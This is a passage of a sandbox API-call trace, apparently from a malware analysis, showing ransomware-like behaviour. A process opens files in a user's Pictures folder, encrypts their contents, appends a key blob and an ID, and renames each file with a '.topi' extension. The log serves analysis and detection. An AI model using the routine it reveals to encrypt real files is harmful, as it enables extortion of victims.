ftLastAccessTime.dwHighDateTime=0x1d5c2ce, ftLastWriteTime.dwLowDateTime=0x840be040, ftLastWriteTime.dwHighDateTime=0x1d5c2ce, nFileSizeHigh=0x0, nFileSizeLow=0xe1dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E1i4o8lCxx-bef.gif", cAlternateFileName="E1I4O8~1.GIF")) returned 1 [0095.478] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E1i4o8lCxx-bef.gif") returned=".gif" [0095.478] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E1i4o8lCxx-bef.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e1i4o8lcxx-bef.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.478] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=57821) returned 1 [0095.478] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.481] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xe1b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.481] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.482] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0095.483] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.483] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.483] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.483] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.483] GetLastError () returned 0x0 [0095.483] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.483] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0095.483] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.483] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.483] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.483] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.483] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.484] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe1e0) returned 0x9a06a00 [0095.484] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.484] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1cc8 [0095.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94b0 [0095.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1d10 [0095.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94c8 [0095.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94f8 [0095.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9510 [0095.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.484] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.484] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94f8 | out: hHeap=0x680000) returned 1 [0095.484] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9510 | out: hHeap=0x680000) returned 1 [0095.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9510 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d94f8 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9510 | out: hHeap=0x680000) returned 1 [0095.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94f8 | out: hHeap=0x680000) returned 1 [0095.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.485] GetCurrentThreadId () returned 0x8c4 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f63d0 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.485] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.486] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.486] GetCurrentThreadId () returned 0x8c4 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.486] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.486] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.486] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.486] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.486] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.486] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.487] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94f8 [0095.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.487] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.487] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.487] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.487] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.487] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.487] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9510 [0095.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.487] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.487] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94e0 [0095.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.487] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.487] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.487] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.487] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9528 [0095.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.487] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0095.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.487] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94f8 | out: hHeap=0x680000) returned 1 [0095.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94f8 [0095.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94f8 | out: hHeap=0x680000) returned 1 [0095.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9528 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9510 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94e0 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94c8 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1d10 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.490] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xe1d8, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xe1d8, lpOverlapped=0x0) returned 1 [0095.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.490] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xe1dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.490] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.491] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.491] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.491] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.491] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.491] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.491] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.491] CloseHandle (hObject=0x6a8) returned 1 [0095.492] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0095.492] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0095.492] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0095.493] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E1i4o8lCxx-bef.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e1i4o8lcxx-bef.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E1i4o8lCxx-bef.gif.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e1i4o8lcxx-bef.gif.topi")) returned 1 [0095.493] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.493] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.493] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.495] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x706a3900, ftCreationTime.dwHighDateTime=0x1d5bd84, ftLastAccessTime.dwLowDateTime=0x945d2e00, ftLastAccessTime.dwHighDateTime=0x1d5c539, ftLastWriteTime.dwLowDateTime=0x945d2e00, ftLastWriteTime.dwHighDateTime=0x1d5c539, nFileSizeHigh=0x0, nFileSizeLow=0x18c47, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eAID79ide.jpg", cAlternateFileName="EAID79~1.JPG")) returned 1 [0095.495] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.495] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0095.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.495] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eAID79ide.jpg") returned=".jpg" [0095.495] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eAID79ide.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\eaid79ide.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.495] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=101447) returned 1 [0095.495] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.498] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x18c21, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.498] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.499] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.499] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x18c47, lpOverlapped=0x0) returned 1 [0095.500] lstrlenA (lpString="-----BEGIN PUBLIC 